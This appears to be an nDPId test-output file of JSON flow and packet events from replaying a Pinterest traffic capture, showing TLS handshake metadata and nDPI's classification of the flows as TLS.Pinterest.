-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605289712203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712203,"pkt":"qtsDr8lk5EKm5WPyht1gAqhwACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBwAAAAAAACAKn6wBu\/7xm0eeabeVgBAB9aoLAAABAQgKp4B90cK4Zak="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289712420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgHAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbufrJ5pt5X+8ZtIgBAL8Z94AAABAQgKwrka9Kd\/yRw="} -00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289713743,"flow_last_seen":1605289713743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289713743,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMAAAAAAoAL9INluAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoQAAAAAoAL9IDStAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGkAAAAAoAL9INWDAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2UAAAAAoAL9IGEKAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWeOms5zmKAxNmoBJXgFEqAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gDFiUACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnQBu8NFBoWjvEV3gBAB+5BsAAABAQgK1mIgKsK5Ifo="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 